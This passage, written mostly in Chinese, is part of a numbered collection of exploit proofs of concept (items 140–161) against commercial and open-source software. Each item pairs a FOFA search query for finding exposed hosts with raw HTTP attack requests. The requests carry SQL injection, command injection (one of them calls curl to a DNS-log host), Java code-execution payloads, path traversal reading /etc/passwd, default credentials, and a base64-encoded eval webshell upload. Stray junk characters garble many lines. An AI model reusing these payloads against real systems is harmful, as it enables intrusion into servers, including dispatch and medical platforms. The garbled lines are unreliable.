GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.14 q6 h$ I2 t9 ^& \- O4 v6 U) c0 m
Host: x.x.x.x/ `, C7 n, z, c0 j4 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 u# B% z" x; g% h( A3 ?) UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ K; g4 T Y& U0 S/ T3 _1 a3 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 }$ C+ Z s& O4 Z( ]+ bAccept-Encoding: gzip, deflate, br$ l3 d% g w/ |, R' t
Connection: close+ P7 v, u- O, ~2 c! q1 ^9 w ?5 K9 t
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk& `* v7 F* \/ q7 V- @" x1 q
Upgrade-Insecure-Requests: 1
- y. j5 j7 b3 f" R, I7 J& c8 ^! S8 a
; F8 v7 M: |5 V# [140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
; e" Z7 D( m" t. SCVE-2024-2566
2 y" @, q8 s1 h3 CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% {- |) d: h1 Y( K1 U* n# L
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.11 p+ c$ Z3 N9 C2 x
Host: x.x.x.x! F1 h7 o/ d6 N" W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" M6 O9 \: U) f# ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' J1 O: @) v1 I" \4 S# F2 @ A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% q( h+ R% k% B' K
Accept-Encoding: gzip, deflate, br: E% y- X1 e. ?: R, k H
Connection: close
6 n, r" W. N$ @4 E7 u( v/ zCookie: authcode=h8g9* O* @; S0 }* E6 C
Upgrade-Insecure-Requests: 1
G/ b$ m1 n: |+ C: D
. U4 T4 J# K. A' i! ]9 B: K, R; _3 K7 M
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: i0 |* U, C$ b% P3 `2 |& r
FOFA:body="指挥调度管理平台"
# H. G0 G/ D8 V/ ~7 P. @/ UPOST /app/ext/ajax_users.php HTTP/1.1
3 b4 J6 T* u2 y5 f6 f$ y9 i3 E, qHost: your-ip
) H, Y7 s& a& N) L% w$ D+ v- tUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info) l" v+ Q G0 ]
Content-Type: application/x-www-form-urlencoded
& k/ B. G8 u1 \* u. ]
" t% m1 q' g4 N9 G/ x2 x" A. M' V% a! r1 q- B+ \& C% f9 o
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
# o; v6 G# L) {- o" x, s7 K4 F9 ^4 _7 i5 v+ k
& o. b5 u4 I( i, b' ?% i% e, B( l8 v a
142. CMSV6车辆监控平台系统中存在弱密码 V6 U- u: n/ M8 e" o) H
CVE-2024-29666# O/ Y( H9 ?. n0 @
FOFA:body="/808gps/"
7 p$ Z) E6 i2 v, `) Badmin/admin
7 H- U7 u. l4 J+ P: \143. Netis WF2780 v2.1.40144 远程命令执行
" D+ n1 N/ e- |1 ?4 GCVE-2024-258505 G% h9 N7 @6 H) q0 C
FOFA:title='AP setup' && header='netis'
; j/ g0 ~5 d$ ^ s7 O# b% ?PAYLOAD; ]9 X) `+ W) x' N7 T2 q
) G6 g+ m3 o( | _1 a144. D-Link nas_sharing.cgi 命令注入2 v9 f/ V% j. q C
FOFA:app="D_Link-DNS-ShareCenter"/ o2 C8 i+ D D2 g* o
system参数用于传要执行的命令: w; h5 y" P- K8 B+ `8 @/ n
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
! d1 Z) x# f+ I d, C6 O: D- NHost: x.x.x.x6 v, C3 q' h) I: K$ I% Z3 k7 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0& i6 k& x9 d! N( ~+ G/ r$ g% ~8 x
Connection: close
) Z" t" {2 Q; r% _7 Y6 ?Accept: */*7 e6 C$ d. ?5 L8 ~
Accept-Language: en
$ p5 r* c$ |! Z- f" i0 a% e( FAccept-Encoding: gzip- G% k/ _4 Y9 }6 P' N
0 l- V4 |: }! L4 t0 b2 I
& ^; A3 k' g$ H1 ~% r2 V5 L# W2 S145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 W, f) ?$ X, D( V. a+ K
CVE-2024-3400
5 w) }/ _' k" C B. J- P1 b! eFOFA:icon_hash="-631559155"+ g& a" \/ d7 N( C5 L
GET /global-protect/login.esp HTTP/1.1
1 T1 D* P; @. AHost: 192.168.30.112:1005" u% q# Q- y3 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 I; z \/ C2 P
Connection: close1 T3 x$ R3 A" h# s5 w S. n6 @5 v
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;# G) s% j9 D' p
Accept-Encoding: gzip
6 U4 n v" [3 b& X0 \7 o# v- _
- X3 p3 w, s3 y: T/ ]; z+ l+ r
) q8 n$ m8 j6 {! v146. MajorDoMo thumb.php 未授权远程代码执行
/ g& y. E) D$ W9 C }CNVD-2024-02175
8 s6 Q" b& d' f1 b% t5 Z# KFOFA:app="MajordomoSL"
+ y* R$ m* v: {$ t( |GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
; c& b* c6 j" Z0 B6 @Host: x.x.x.x6 Q" p9 q% F# u' t9 u' E) S, M& Y7 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.841 U/ E4 u3 S8 {9 s: T; w
Accept-Charset: utf-8
: `( Q# f, e4 I. _Accept-Encoding: gzip, deflate
/ W s- I: h2 |$ b7 i' l5 N( Q9 oConnection: close+ n. I; B. r- _ Y' e6 A
( q) o0 O! [* e& P9 ^4 d
c; g' D8 y# G/ w" E! X147. RaidenMAILD邮件服务器v.4.9.4-路径遍历. h, D1 x# H2 g$ |
CVE-2024-323994 n* G, V0 Q _- B; U. o4 o
FOFA:body="RaidenMAILD"
" W# b. Q8 e* t# _GET /webeditor/../../../windows/win.ini HTTP/1.1
7 D0 X% P/ E0 A8 i8 R2 }2 lHost: 127.0.0.1:81% |8 z* }" v* o: J9 ]
Cache-Control: max-age=0
' f& U, Y$ a/ C) P0 }Connection: close, k4 X# F' g* K: L0 b
. ?5 a' i, k6 e% S0 P" H% \
' {0 G4 H5 G& w( O6 e! k148. CrushFTP 认证绕过模板注入
: h. C! B9 E5 o' k fCVE-2024-40408 q/ F' l! d( s2 a
FOFA:body="CrushFTP", z; R! `' ?2 |$ d. C
PAYLOAD
$ g6 y% p/ {/ b* J0 f
1 F4 g9 C9 b( } ^/ r! e6 `; q3 l149. AJ-Report开源数据大屏存在远程命令执行
: c! `# }3 j$ Z: o$ JFOFA:title="AJ-Report"
@+ X$ S- V+ b0 [$ ^* Y. B) {: M0 t+ K0 c2 n3 G% M
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
$ p4 z0 f! n! g& Z6 i6 D; {Host: x.x.x.x
* I& {4 |# W m6 S* [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 |' y2 Q6 E5 P+ y: @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ N) N0 c5 P* k9 e1 S5 o& H6 {7 w
Accept-Encoding: gzip, deflate, br
+ ?. B: y% C9 b/ |/ @2 dAccept-Language: zh-CN,zh;q=0.9
2 S, U. B1 O7 YContent-Type: application/json;charset=UTF-8
4 v! {9 ?7 L( v. ^/ MConnection: close
2 W. H* C( M P5 Q# \3 q( T z& s5 [( c" G
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) F8 p2 Y1 D% P. z) G, N# x# O6 a4 M9 u( c4 m/ J6 V8 l
150. AJ-Report 1.4.0 认证绕过与远程代码执行
' q T5 r; f p4 r5 x3 \3 f1 FFOFA:title="AJ-Report", N% A1 C/ _ {2 H3 l1 I- k! }3 y
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& g. V [- Y( D0 \4 IHost: x.x.x.x9 l6 } v! F+ D- K. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 H, h1 B0 E5 L4 W9 c- n4 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% q5 z2 d1 S0 P. [5 V2 `Accept-Encoding: gzip, deflate, br0 {2 R. g' l5 F4 {2 n9 B
Accept-Language: zh-CN,zh;q=0.9: A5 n" F1 u4 N7 k
Content-Type: application/json;charset=UTF-8
* d) ?6 d0 G( r3 {; SConnection: close
+ v/ d9 x3 Z m( OContent-Length: 339, n9 t1 e. z4 ^, \$ N- p0 }1 {
$ Q+ ~0 ^+ ?0 |( a9 p/ C5 b4 n
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
9 Q- \4 b0 H, b5 e: j, }0 H: X7 s8 h6 a0 Z2 r/ |
! u7 _# Z0 T1 z! X8 ~151. AJ-Report 1.4.1 pageList sql注入 n& c( W# U5 N% F
FOFA:title="AJ-Report"7 ^) ]* k9 j8 C9 b( U5 O
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
9 k' i; y+ k; J2 g* U5 p1 {! dHost: x.x.x.x, U/ s$ M+ L( Z% U. }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 N2 w' S' a5 `6 X) OConnection: close
: c3 W$ _' w0 H9 L% P" S: B" jAccept-Encoding: gzip6 H6 {2 e6 d q4 L
: I5 Q& M7 ]5 \9 N
h8 c6 }2 ^7 g+ {
152. Progress Kemp LoadMaster 远程命令执行- ]- ^- ~$ c; ^/ ]! m( Q
CVE-2024-1212
; E x( s* r1 Z, ?% z, B+ A4 w/ BLoadMaster <= 7.2.59.2 (GA)
1 x' X) ?. R5 J5 S1 v+ u, CLoadMaster<=7.2.54.8 (LTSF) A R Y: a& G/ m* X
LoadMaster <= 7.2.48.10 (LTS)
9 Q$ b8 q r/ l0 T1 K, I }5 i3 aFOFA:body="LoadMaster"
( ?& s+ S8 s3 f1 B0 B* Z& TJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码2 _! M5 }$ R9 q! ?( f, r
GET /access/set?param=enableapi&value=1 HTTP/1.1
3 @* M5 A7 W7 ?3 P% YHost: x.x.x.x
# A( [3 B! ?( G( I6 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
9 h4 W: H, Y. {7 ~6 vConnection: close; L6 A& r V& d7 T/ F6 O8 a
Accept: */*$ u3 K$ s" g$ K7 J+ v' O1 o
Accept-Language: en- e# A; a+ r2 ]0 K
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
: l0 m6 E" e5 k, G, L. jAccept-Encoding: gzip- Q+ c. \# N! @7 X. z
* `. i9 c- h' h" @' {% X6 ~+ ?' j7 \3 k
% s9 {3 m ]1 ?- ~& M153. gradio任意文件读取 W& |1 j+ R# r5 W# K6 y/ |4 l
CVE-2024-1561FOFA:body="__gradio_mode__"
2 k2 Q+ P4 v3 r- m第一步,请求/config文件获取componets的id
9 _- I5 [! L5 d/ r2 P/ a4 Ahttp://x.x.x.x/config
- z6 [. X- R7 v( s6 V
. M" Y$ _ |9 X d1 _3 ]4 r- ?. _) r9 I' V+ M
第二步,将/etc/passwd的内容写入到一个临时文件% G0 R9 F: \! Z9 M( ^5 }
POST /component_server HTTP/1.1
( q1 n# P$ E: p |/ [4 S$ N5 tHost: x.x.x.x
3 s" P* @' E, ~! l3 r: XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.30 ~3 p* r. B% N1 f+ Z9 n" o
Connection: close0 t" x3 Y4 b9 y4 E1 a' D
Content-Length: 1151 b8 u3 W" b4 q+ q+ Y0 @/ e
Content-Type: application/json$ w3 f( K' S' {( z( }0 G! x
Accept-Encoding: gzip$ {* b+ k) P( {3 B
* N/ ^) W% u- c( {8 a; P{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}. `' Q1 y: m# O: h
4 H8 r" \; @' V' s- S
4 ]* p6 t/ C) q: _0 \第三步访问8 \8 T; q0 f3 y) T5 t4 Y
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd9 }5 W( a3 z- h0 Z1 K7 {! D
! M/ ]1 D- u0 N. F# V
{0 \$ N8 e8 o154. 天维尔消防救援作战调度平台 SQL注入1 j: e W7 l" b
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
+ e- N+ U5 F5 {+ e: Q4 l) mPOST /twms-service-mfs/mfsNotice/page HTTP/1.1: v" X- S3 y, O8 ?' O
Host: x.x.x.x
$ I- E7 Y# H8 { l/ H2 A/ e5 N/ V8 J3 |Content-Length: 1067 q0 v4 p1 x# M( H- k
Cache-Control: max-age=0
! [8 c( `% H# @Upgrade-Insecure-Requests: 1
% G, k- i W. uOrigin: http://x.x.x.x7 ]! [$ Q( q7 h( D! M y. g
Content-Type: application/json, A, ^! m; Q4 |. W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; k9 x L5 o4 Z- r0 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" r6 i9 A5 N. H9 v, k; z
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page% U( X* s/ w7 O5 J7 q+ w4 W
Accept-Encoding: gzip, deflate
& \5 y$ }# f, e+ k5 E1 BAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
, W( C4 X6 f6 A8 W4 t1 jConnection: close: g4 Y6 ~, i. z' x
- {8 {; |" C: x' K! c! Y& y{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
: b' Q7 d0 p( J% p' I, w7 F6 N8 A
6 g) Q) j6 o6 a' ]/ L
; J, `# a8 U( x( Y155. 六零导航页 file.php 任意文件上传8 q; y p* U$ ^# H$ f* a
CVE-2024-34982
4 h5 q$ Z, ?; Z: R2 OFOFA:title=="上网导航 - LyLme Spage"
9 T- A1 W6 @8 _1 D2 `6 e7 B7 IPOST /include/file.php HTTP/1.1
5 i( W9 M) C! N4 R1 ZHost: x.x.x.x
# ]. N' g: l# v: V* p+ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, Y% ^: H3 P2 A% [
Connection: close
, X0 D% e/ Q( pContent-Length: 232) t4 S( ~# k9 N+ \, O7 z. S
Accept: application/json, text/javascript, */*; q=0.018 [. z! N& C# T' n3 T3 D- B
Accept-Encoding: gzip, deflate, br
4 w4 Y) _5 ?7 ~6 n/ G) a$ [. FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( j6 d7 A/ J. h1 R0 m. sContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
: i* F& F/ V Y6 k. U* kX-Requested-With: XMLHttpRequest
. n% w( @, {% X2 m8 W5 `7 |/ d) t- N1 w. G
-----------------------------qttl7vemrsold314zg0f
* `& I8 i6 t9 I" F# e5 x! k2 mContent-Disposition: form-data; name="file"; filename="test.php"
! q1 `. P6 X# n" W- R6 OContent-Type: image/png1 @( S3 V p! [+ I
3 M @8 d3 X* s$ x5 u<?php phpinfo();unlink(__FILE__);?>
: W, T, r' ^0 D3 F* A-----------------------------qttl7vemrsold314zg0f--
# S' h+ T ?4 G* @) @
: s* K! i/ t9 u' K' P$ r
; E% y7 h* v# l1 ~" h! c访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
+ ]4 s) ~& f2 Q. X. ?0 {7 h3 d$ {( r3 Z% w/ M- w0 e* f3 f
156. TBK DVR-4104/DVR-4216 操作系统命令注入
. S5 r" D7 z: ^& ^8 xCVE-2024-3721. R4 z2 s/ U% t5 u7 _0 f
FOFA:"Location: /login.rsp"
. \: |* }8 t5 W3 z" ]* `+ U& X5 o·TBK DVR-4104) @8 [& W9 r7 h
·TBK DVR-4216
8 X$ K) l7 S; p2 s: e& M% L- Q9 _curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
( w) {+ _4 b! \' a
. Q; |4 v; l z4 J# e, V) J) u+ r/ U1 Q
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
- F' c- r- L$ h: d1 v5 W9 vHost: x.x.x.x1 V6 e/ `) s" v. Z' W0 w' n J, n
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ S0 U+ F9 @; Q
Connection: close, N: q/ w& {3 R; R
Content-Length: 0
4 E ~/ Y9 `, J' R8 ^' i5 WCookie: uid=1: `# I5 r. J$ @' E1 Q9 c- _
Accept-Encoding: gzip$ V# u/ A" e ~ j- t8 i
|: T' [! J1 m2 S% V9 |
7 {0 ]4 N) i: e' w) g C157. 美特CRM upload.jsp 任意文件上传
( |' `; e5 U: @4 f! ?CNVD-2023-06971/ J, d3 \# A. [5 K
FOFA:body="/common/scripts/basic.js"
$ J! Q5 ^3 s7 u+ [! z+ @POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
8 |. N# S8 X, W2 rHost: x.x.x.x8 G& O, j' Z& K2 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.365 t7 z4 d2 m. R/ e! k* X$ e
Content-Length: 7097 u! x3 {- M$ @) K0 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 O" |! ^# e6 G) J w4 _' F
Accept-Encoding: gzip, deflate
& @# |* }0 n& y2 P4 _- z! \Accept-Language: zh-CN,zh;q=0.9
3 ]3 H* k2 A! L, ^2 d" QCache-Control: max-age=0" c% I! z X7 H
Connection: close
5 a' e7 I/ @& e q! W! eContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
% O8 K% A. H. A2 }( ]Upgrade-Insecure-Requests: 1
* e: T# Z! n/ |
/ T# R/ n+ h W& D K------WebKitFormBoundary1imovELzPsfzp5dN
( v& }4 L3 O8 Z5 I9 VContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
6 [; p7 Q- y) t( s# Z+ @7 CContent-Type: application/octet-stream
6 x3 z: v' E& d% U- t' v8 O" o' i. l0 m9 o4 m
nyhelxrutzwhrsvsrafb' j$ L. x. Y! t% L# ^
------WebKitFormBoundary1imovELzPsfzp5dN! R) F9 K9 F6 ^
Content-Disposition: form-data; name="key"4 s5 X3 d7 ]% @6 e/ T; R- _5 z
; v, y4 C' h* ]. F; |1 _( Vnull8 i* s' a( B" G. E0 {$ V
------WebKitFormBoundary1imovELzPsfzp5dN
8 e! g- @: U) u. ?, S- rContent-Disposition: form-data; name="form"$ c) C3 X5 t9 k* q7 m
; R6 M. o& Q. G8 m- v
null! o1 c7 w* M2 G! J- T2 T! X& s, G
------WebKitFormBoundary1imovELzPsfzp5dN( p! N. l$ s# E' G6 W# Z
Content-Disposition: form-data; name="field"
+ }0 b* I4 i- M8 V4 c2 B1 J, K! T+ Q
null
% t0 m, z7 E2 W! v------WebKitFormBoundary1imovELzPsfzp5dN
7 x" a( c, P2 {Content-Disposition: form-data; name="filetitile"
) I; c! Q) Q- g5 a6 f. `1 T+ n* a4 t1 z; O3 T5 l1 Z
null1 F" H0 u! r6 b- E
------WebKitFormBoundary1imovELzPsfzp5dN9 J! m) ^1 `7 x0 Y: |
Content-Disposition: form-data; name="filefolder": {9 _1 y4 i0 O0 G
' j+ U# X" F/ S+ ~# }& M/ z
null
6 D4 u- d& P. w5 O/ _------WebKitFormBoundary1imovELzPsfzp5dN--
, `' e( x% {4 ~) q; f. }. z9 i ~. Z) @! x/ ]8 V7 ?7 H# u
6 }: N5 ?3 C" Q3 o6 dhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
3 g7 [6 l" j3 ]9 [
. n6 e/ M$ v' d8 \158. Mura-CMS-processAsyncObject存在SQL注入
/ R! _4 O# Z: S- s& x( ^0 G4 h' mCVE-2024-32640: d ]8 z* \, H1 w2 |; S# Z
FOFA:"Generator: Masa CMS"0 X+ }6 r# f- A% A# g6 o) h3 _ H
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( D0 N+ o7 ~! }4 j( K3 Y0 ^Host: {{Hostname}}
$ q& y! A8 D. o! m! \) O; y# YContent-Type: application/x-www-form-urlencoded
- ~) n( ]. l- P- A, [
2 t8 e; C8 E ^- z' gobject=displayregion&contenthistid=x\'&previewid=14 x9 ~" o7 M3 N" F7 n' c
5 ?; N3 a2 N8 f3 C Y9 W
! B/ ]* y, C; R4 g159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传9 s+ ?* H _' K. g; H, B, l6 n: |5 b
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
# h- H0 r: d, Z: g8 v" l5 ?# g" O( l5 BPOST /webservices/WebJobUpload.asmx HTTP/1.1 U) V7 t$ J0 I: L9 ?+ t9 d
Host: x.x.x.x
$ V" _3 O, V1 J' Y/ Q- v( s$ A1 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
' r, M+ ]; m, Z3 h5 @+ MContent-Length: 10801 V3 |# s' N' ^
Accept-Encoding: gzip, deflate
: D' _, L; t5 h; pConnection: close1 U" `) ? T/ Z+ I! J
Content-Type: text/xml; charset=utf-8& U8 p6 o: x v& R
Soapaction: "http://rainier/jobUpload"& c4 A; i2 x: k
( L* m' E9 z. S6 q% W+ a<?xml version="1.0" encoding="utf-8"?>
; O" w$ O! J+ `8 i, o7 ~<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* D5 L, G* s$ N2 a3 @: \; u<soap:Body>
V6 I5 w0 w' l: }( s3 u<jobUpload xmlns="http://rainier">' n6 K) G1 t' u
<vcode>1</vcode>: q- Q8 b! \4 j( B$ E* M
<subFolder></subFolder>! g) O2 K9 e& e% o
<fileName>abcrce.asmx</fileName>
2 O J: m' o9 k9 s& T; ]<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>. p) p% P. \" x3 i" K( J
</jobUpload>
, w8 e% V$ N8 y8 ]</soap:Body>
3 _& d8 f/ `, r! p7 e</soap:Envelope>: R. x2 o: C/ Q! a* w" h
9 ^7 \+ a/ k$ Q3 w) k; D5 O8 f' t* f+ N8 Z' {1 [& z1 b
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")" O7 n- B& P! Q: L/ Q& R0 H
8 `! _8 E3 R7 d( z+ B- a5 C5 Q( N! w9 P/ M. T
160. Sonatype Nexus Repository 3目录遍历与文件读取
6 t6 o, s: q1 V2 D% TCVE-2024-4956
# ]& |1 u* s R$ z; O( v0 QFOFA:title="Nexus Repository Manager") I, _, h, D8 P- `7 F
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
* m+ s g! i z1 WHost: x.x.x.x; ?$ k/ w9 x- n% T& y6 B1 x# e
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
: y: C- a1 B, w: s" s# }+ }Connection: close
! L1 x: ?3 D: J+ r# S0 P' MAccept: */*
: ?7 ^7 e0 O+ k4 Z" [8 r+ qAccept-Language: en
8 Z2 }+ N6 w1 o& {% IAccept-Encoding: gzip
D6 ^# `( ?% Y! M$ z y9 x" c$ @* j/ U
4 ^' R+ A0 b' S! v. j+ D161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
' ?2 G2 ?* u4 r6 wFOFA:body="/KT_Css/qd_defaul.css"9 m9 y; S' {' z' O6 n C
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密7 a3 A; k6 w1 H4 r/ c; J O* c5 g
POST /Webservice.asmx HTTP/1.1( S. }3 l: o" c
Host: x.x.x.x
& k6 r) E4 E r- e4 q! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! S; f- Q1 [1 Z' G* [4 w4 K' ?3 o \Connection: close2 P B; S9 m7 F
Content-Length: 445& y+ f! T5 p, i5 K n# q# B
Content-Type: text/xml3 e$ u" f3 Z6 F5 F7 v- Y4 n, U
Accept-Encoding: gzip) T1 y2 c1 u0 q. k: m7 ~
: u! a7 X. K- |6 O4 j' O. m<?xml version="1.0" encoding="utf-8"?>
/ @$ b9 z3 V7 _3 R& ~$ p: z( T& s2 V7 N<soap:Envelope xmlns:xsi="
# C5 ]& @7 W. V4 x, Jhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
. `1 R* n) H d+ o% Zxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ f$ J) |+ {9 k" D<soap:Body>
0 n3 \2 W6 `% l* d<UploadResume xmlns="http://tempuri.org/">
